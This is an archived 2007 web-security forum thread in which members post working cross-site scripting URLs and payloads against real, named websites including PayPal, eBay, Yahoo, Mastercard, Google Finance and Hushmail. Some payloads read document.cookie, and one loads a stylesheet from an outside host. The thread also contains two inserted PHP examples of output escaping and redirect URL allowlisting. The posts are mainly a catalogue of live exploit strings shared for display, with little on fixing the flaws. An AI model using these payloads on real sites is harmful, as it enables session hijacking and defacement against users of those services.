Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: Anonymous User
Date: November 03, 2007 08:34AM

Wow that one rocks even more! nice work!

Re: So it begins
Date: November 03, 2007 03:53PM

http://www.census.gov/cgi-bin/gazetteer?city=<script>alert("Utterly Useless");</script>
I got bored. Really bored.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Date: November 03, 2007 04:08PM

http://www.ice.gov/exec/whereis/?qu=<script>document.title="Bored";</script>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: tehryan
Date: November 03, 2007 08:51PM

http://www.w4ck1ng.com/denied.php

Spits back an unsanitized user-agent, could be hit with forced forging of headers. Which begs the question, how many methods do we all know for forcing forged headers other than the old flash vector?

Also, why are we still trusting $_SERVER[]? :S

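The point tehryan raises about echoing `$_SERVER` values, as an added PHP example that is not part of the original thread: request headers arrive under `$_SERVER['HTTP_*']` and are client-controlled, so they are escaped at output time. The function names `h`, `request_header` and `render_denied` are hypothetical, and the sample request is constructed.

```php
<?php
// Added example: treat every $_SERVER['HTTP_*'] entry as client-controlled input.

/**
 * Escape a value for an HTML text node or a quoted attribute value.
 * ENT_QUOTES covers both " and '; ENT_SUBSTITUTE replaces invalid UTF-8
 * instead of returning an empty string.
 */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Read a request header from a $_SERVER-style array, strip control characters
 * and cap its length so the value is also safe to write to a single log line.
 * The array is passed in so the function can be exercised without a web server.
 */
function request_header(array $server, string $name, int $maxLen = 256): string
{
    $key = 'HTTP_' . strtoupper(str_replace('-', '_', $name));
    $raw = isset($server[$key]) && is_string($server[$key]) ? $server[$key] : '';
    $raw = preg_replace('/[\x00-\x1F\x7F]/', '', $raw) ?? '';
    return substr($raw, 0, $maxLen);
}

/** Build an "access denied" page fragment with the header escaped on output. */
function render_denied(array $server): string
{
    $ua = request_header($server, 'User-Agent');
    return '<p>Access denied for client: <code>' . h($ua) . '</code></p>';
}

// Constructed sample request: a User-Agent header carrying markup.
$sample = ['HTTP_USER_AGENT' => 'Mozilla/5.0 "><script>alert(1)</script>'];
echo render_denied($sample), PHP_EOL;
```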
Re: So it begins
Posted by: nemessis
Date: November 04, 2007 06:58AM

Not so dangerous but...

hxxp://answercenter.ebay.com/doRedirect.jspa?url=javascript:alert('Nemessis-WWW.RSTZONE.ORG-Firefox-Only')

(It works only with Firefox)



Edited 1 time(s). Last edit at 11/04/2007 07:00AM by nemessis.

Re: So it begins
Posted by: nemessis
Date: November 04, 2007 09:14AM

PayPal.com

knowledge.paypal.com/paypal/documentDisplay.do?clusterName=PaypalCluster&preview=1&groupId=1&page=http://knowledge.paypal.com/paypal/solution.jsp?id="><script>alert(/Nemessis-WWW.RSTZONE.ORG/)</script>&docType=1006&resultType=5002&docProp=$solution_id&docPropValue=vs3422

Re: So it begins
Posted by: Fugitif
Date: November 04, 2007 01:17PM

Very nice, a few days ago I sent one to xssed.com and now I have two others, always in PayPal.

Re: So it begins
Posted by: nemessis
Date: November 04, 2007 05:51PM

They still have old pages with some issues but I really like how they patch everything very fast.

Re: So it begins
Posted by: nemessis
Date: November 05, 2007 09:54PM

Yahoo (Works with IE6)

hxxp://kr.blog.yahoo.com/dudnfkd031/GALLERY/show_image_v2.html?img=javascript:alert(/Nemessis/)

hxxp://cn.widget.yahoo.com/gallery/view.htm?widgetID=237&cate="><script>alert(/Nemessis/)</script>

hxxp://xk.cn.yahoo.com/category.cgi?category="><script>alert(/Nemessis/)</script>

hxxp://captcha.chat.yahoo.com/go/captchat/?img=javascript:alert(/Nemessis/)

Already submitted to xssed.com. Tomorrow I will post an entire Yahoo! subdomain full of cross site scripting vulnerabilities.

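The `url=` and `img=` parameters in nemessis's eBay and Yahoo posts above take a URL straight from the query string. As an added PHP example (not code from the thread or from either site), this is a scheme and host allowlist applied before such a value reaches a `Location` header or an `href`/`src` attribute. `safe_url`, the allowlist and the `.test` hostnames are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example: check a user-supplied URL before it is used in a redirect,
// an href or an img src. Names and hosts below are hypothetical.

function safe_url(string $candidate, array $allowedHosts, string $fallback = '/'): string
{
    // Browsers tolerate whitespace, control characters and backslashes in places
    // where parse_url() does not agree with them, so reject those outright.
    if ($candidate === '' || preg_match('/[\x00-\x20\x7F\\\\]/', $candidate)) {
        return $fallback;
    }
    $parts = parse_url($candidate);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return $fallback; // relative, scheme-relative (//host) or malformed
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return $fallback; // javascript:, data:, vbscript: and similar schemes
    }
    if (!in_array(strtolower($parts['host']), $allowedHosts, true)) {
        return $fallback; // open redirect to a host we do not control
    }
    return $candidate;
}

// Constructed inputs: one accepted URL, then one per rejection path.
$allowed = ['answers.example.test'];
$samples = [
    'https://answers.example.test/topic?id=7',
    'javascript:alert(1)',
    ' JaVaScRiPt:alert(1)',
    '//other.example.test/',
    'https://answers.example.test@other.example.test/',
];
foreach ($samples as $url) {
    $target = safe_url($url, $allowed);
    // The validated value is still HTML-escaped when it lands in markup.
    printf("%s\n", htmlspecialchars($target, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'));
}
```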
Re: So it begins
Posted by: Fugitif
Date: November 06, 2007 11:39AM

Mastercard

http://www.mastercard.com/us/personal/en/cardholderservices/securecode/shop_online_results.html?letter=%22%3E%3Cscript%3Ealert(%22XSS%20by%20Fugitif%22)%3C/script%3E


http://www.mastercardbrandcenter.com/mcbrand/us/getourbrand.do?pageId=dl_1210&expertVisible="><script>alert("XSS by Fugitif")</script>

Re: So it begins
Posted by: Fugitif
Date: November 06, 2007 02:47PM

http://www.cyberdefender.com/phishing_alerts.html

They speak of phishing attacks and scams? LOL

and it is more vulnerable than others

1

http://support.cyberdefender.com/cgi-bin/support/kb.cgi?view="><script>alert(/XSS by Fugitif/)</script>

2

http://www.cyber-defender.com/EDC/download/1/?affl=cdsite_edc&campaign_code="><script>alert(/XSS by Fugitif/)</script>

and 3


http://support.cyberdefender.com/cgi-bin/support/kb.cgi?view=160&lang='

Re: So it begins
Posted by: kirke
Date: November 11, 2007 06:57AM

http://www.cyberdefender.com/phishing_alerts.html?email=a%22%3E<p>%3Cimg%20src=%22//ha.ckers.org/images/stallowned.jpg

Re: So it begins
Posted by: zwerg
Date: November 12, 2007 09:27PM

It only takes a couple of minutes to find ... and a lack of input validation.

http://www.lowes.com/lowes/lkn?action=productList&N=0&Ntk=i_products&Ntt=<script>alert('xss')</script>

Re: So it begins
Posted by: nav
Date: November 16, 2007 04:29PM

wanna buy something?

[www.futureshop.ca]



Edited 1 time(s). Last edit at 11/16/2007 04:30PM by nav.

Re: So it begins
Posted by: digi7al64
Date: November 16, 2007 11:48PM

http://search.chacha.com/search/query?query=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&mode=web&wsid=UK
Sadly they filter out all dangerous characters from the search textbox when focus is lost... but they allow you to enter them directly via the URL.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: Gareth Heyes
Date: November 20, 2007 06:12PM

Based on my current blog post XCSS injection :)
http://www.csszengarden.com/?cssfile=//businessinfo.co.uk/labs/xcss/xcss.css

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: So it begins
Posted by: tx
Date: November 21, 2007 02:36AM

http://www.broadcaster.com/video/search.php?s=dance%20%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3C%21%5B
http://www.broadcaster.com/members/search/?s=<script>alert('xss')</script>&category=vodcast&db=weird&search=videos&section=mobile_vod

-tx @ lowtech-labs.org

Re: So it begins
Posted by: apnovi
Date: November 22, 2007 05:01AM

C.O.M.O.D.O - Creating trust online

Sent an email to Comodo telling them they have XSS on their site, response:

----------------------------------------------------------------------------
Hi,

Sorry for the inconvenience caused.

Now You can download the latest release 3.0.13.268 from http://personalfirewall.comodo.com and uninstall the existing, restart the computer and install the latest.

It will fix your issue.

For more info, Please do refer our forum..
http://forums.comodo.com/feedbackcommentsannouncementsnews/comodo_ firewall_pro_3_has_been_released-t14915.0.html

--------------------------------------------------------

For some reason they haven't realised the problem is with their website, anyway here you go!


http://www.personalfirewall.comodo.com/leak/cpil.html?".'><Script>alert('XSS')</script>"

Re: So it begins
Posted by: klaus
Date: November 25, 2007 12:32AM

Any new ones for technorati, delicious or other popular social bookmarking sites?

;)

Re: So it begins
Posted by: klaus
Date: November 25, 2007 10:49PM

Here's one: http://vuln.xssed.net/2007/11/21/profiles.friendster.com/

For Friendster ;)

Re: So it begins
Posted by: CoLL1eR
Date: November 26, 2007 12:22PM

http://blogpost.imageshack.us/blogpost/postblog_multi.php?back=%3E%22%3E%3Cscript%3Ealert(1)%3C/script%3E">

Re: So it begins
Posted by: tx
Date: November 30, 2007 03:10PM

http://blogmarks.net/search/%255C%2522%253E%253Cscript%253Ealert%2528%252Fxss%252F%2529%253C%252Fscript%253E%253C%2521

-tx @ lowtech-labs.org

Re: So it begins
Posted by: Fugitif
Date: December 02, 2007 05:04PM

XSS on Google.com

Ok..My XSS alert is here
http://finance.google.com/finance/portfolio?action=add&hash

As you see in the screen, we need authentication.



Good, I go inside with my account and now I try to add something to my Portfolio. I try to add something like this

"><script>alert(/XSS/)</script> OR: like this "><script>alert(document.cookie)</script> :)



After I have put in that string and I press the key "Add to portfolio" we can see the surprise




That's all, sorry for those screens, I can't show you any other way

Re: So it begins
Posted by: Gareth Heyes
Date: December 05, 2007 06:39AM

www.hushmail.com

Geez I thought they'd get basic bloody filtering right! From now on I'm not using another webmail service! Arrrggghhhh the web is a mess.

Sending an email to any Hushmail account with this:-
"></tr><script>alert(/XSS/)</script>

Re: So it begins
Posted by: w0ts0n
Date: December 05, 2007 08:15AM

Gareth Heyes Wrote:
-------------------------------------------------------
> www.hushmail.com
>
> Geez I thought they'd get basic bloody filtering
> right! From now on I'm not using another webmail
> service! Arrrggghhhh the web is a mess.
>
> Sending an email to any Hushmail account with
> this:-
> ">alert(/XSS/)

Wow that is really bad... This is.. just hushmail right?

Re: So it begins
Posted by: Gareth Heyes
Date: December 05, 2007 12:10PM

Yeah just Hushmail, I was quite shocked that their security is so bad. I'm never using the service again and they even require you to use Javascript so there's no workaround. I just can't see how it can be a mistake, I mean really what were they thinking?

Re: So it begins
Posted by: tx
Date: December 05, 2007 08:20PM

http://restore.holonyx.com/index.php?option=com_content&view=article&id=25"><script>alert('xss')</script>]!><![&Itemid=28

-tx @ lowtech-labs.org

Re: So it begins
Posted by: Anonymous User
Date: December 06, 2007 01:01AM

Hushmail has more issues regarding flawed encryption, I read it a week ago someplace.

Re: So it begins
Posted by: WhiteAcid
Date: December 06, 2007 02:25AM

Hushmail has simply lost all credibility. Release/warez groups are better off sending off their public keys in their .nfo files.

Of course then there's the issue of setting up a CA when pretty much no one, including the CA can be trusted. Now how's that for an oxymoron.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: Fugitif
Date: December 06, 2007 02:55PM

I am still Fugitif, and now I want to show you how one XSS alert bug on eBay.com can work.
To be more precise, our link now is http://togo.ebay.com

Ok..My XSS alert can be found here http://togo.ebay.com/affiliates/create/



I go to select one version and I crush above



and immediately later click "I WANT THIS ONE"


In the square where it asks for "ID" I put a string like this "><script>alert(document.cookie)</script> (or nothing, and we go directly to "Browse")



and click "Browse"




Now we cannot do anything else other than to use the search with our magic string

"><script>alert(document.cookie)</script>

Result ? !




That's all (sorry another time for the screen... coz only so I can have shown)


/Fugitif
